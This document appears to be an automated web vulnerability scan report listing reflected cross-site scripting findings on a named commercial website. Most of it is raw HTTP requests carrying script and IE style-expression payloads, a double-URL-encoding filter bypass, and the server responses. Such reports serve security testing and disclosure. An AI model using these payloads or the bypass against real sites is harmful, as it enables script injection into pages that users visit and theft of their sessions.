This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/77d5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0eacf7515f/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ivhntdeja4wz04jdiflpz5ap; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.176. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/flowchart.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bdc"><script>alert(1)</script>30cb10048cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/flowchart.asp/x22?c5bdc"><script>alert(1)</script>30cb10048cf=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.177. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/flowchart.asp/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17f1"><script>alert(1)</script>da242985d73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /specials/flowchart.asp/x22?d17f1"><script>alert(1)</script>da242985d73=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75 was submitted in the REST URL parameter 3. This input was echoed as 1b6e6"><script>alert(1)</script>255e7c83b75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/1b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e255e7c83b75?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:30 GMT
Content-Length: 8886
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:30 GMT; path=/
Set-Cookie: ASP.NET_SessionId=c2zv45jn1eebgs45s0y1xfqm; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a was submitted in the REST URL parameter 3. This input was echoed as 5919c"style="x:expression(alert(1))"d2a7fce664a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/5919c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a7fce664a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=obr3du45zbuce445aaaygqnk; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670 was submitted in the REST URL parameter 3. This input was echoed as 2c172"><script>alert(1)</script>9f436bf2670 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/buy-sd.htm2c172%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f436bf2670?id=343769/x22/x3eBuy HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:28 GMT; path=/
Set-Cookie: ASP.NET_SessionId=iunkdq55f4mrs0zhymery055; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 was submitted in the REST URL parameter 3. This input was echoed as 6d6a8"style="x:expression(alert(1))"0f4e3cd6ed9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/sd/buy-sd.htm6d6a8%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220f4e3cd6ed9 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:29 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1q0jrzerd2axjnu1z4yq5c55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8830
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e89d"><script>alert(1)</script>e8ef8708314 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?id=343769/x22/x3eBuy2e89d"><script>alert(1)</script>e8ef8708314 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 420fb"><script>alert(1)</script>680e9c0cc7 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?id=420fb"><script>alert(1)</script>680e9c0cc7 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.184. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/sd/buy-sd.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f2b"><script>alert(1)</script>00c78a59a3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?52f2b"><script>alert(1)</script>00c78a59a3f=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.185. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/sd/buy-sd.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaa"><script>alert(1)</script>366bac39d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/sd/buy-sd.htm?ceaaa"><script>alert(1)</script>366bac39d96=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217 was submitted in the REST URL parameter 2. This input was echoed as 1fb77"><script>alert(1)</script>1ed6dd36217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/1fb77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ed6dd36217?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:13 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rgc5ewevo3ic5ebzjtk3pcfy; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a was submitted in the REST URL parameter 2. This input was echoed as 16ab3"style="x:expression(alert(1))"63feb98e41a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/16ab3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252263feb98e41a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=xznk3xfpvt4fwq45lltljxjn; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8746
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8 was submitted in the REST URL parameter 2. This input was echoed as fff10"><script>alert(1)</script>a7102c9c5a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/smartdraw.aspfff10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7102c9c5a8?id=104640/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1kyde4v2dk5z4w45pkuoyr55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 was submitted in the REST URL parameter 2. This input was echoed as 46591"style="x:expression(alert(1))"94313ed1278 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /specials/46591%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252294313ed1278 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:12 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2ksoxp55cqqywc453rftb3vt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8746
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bb8"><script>alert(1)</script>626eeb09dab was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9eb8"><script>alert(1)</script>02409d83cd8 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.192. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/smartdraw.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a0d8"><script>alert(1)</script>19f5f3d2721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.193. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.smartdraw.com
Path: /specials/smartdraw.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6931"><script>alert(1)</script>1538439b5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2 was submitted in the REST URL parameter 1. This input was echoed as 37c3c"style="x:expression(alert(1))"e679ad699d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=o1ruv145ogifusajxf15cv45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21 was submitted in the REST URL parameter 1. This input was echoed as 5cd21"style="x:expression(alert(1))"9340ce36f21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vrtws45owfyd0ykewtjomyf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 was submitted in the REST URL parameter 2. This input was echoed as 5ce71"style="x:expression(alert(1))"1f48f65f3b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /support/5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:09 GMT
Content-Length: 8739
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/
Set-Cookie: ASP.NET_SessionId=lyrquzi1ro0haeato0nugmis; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
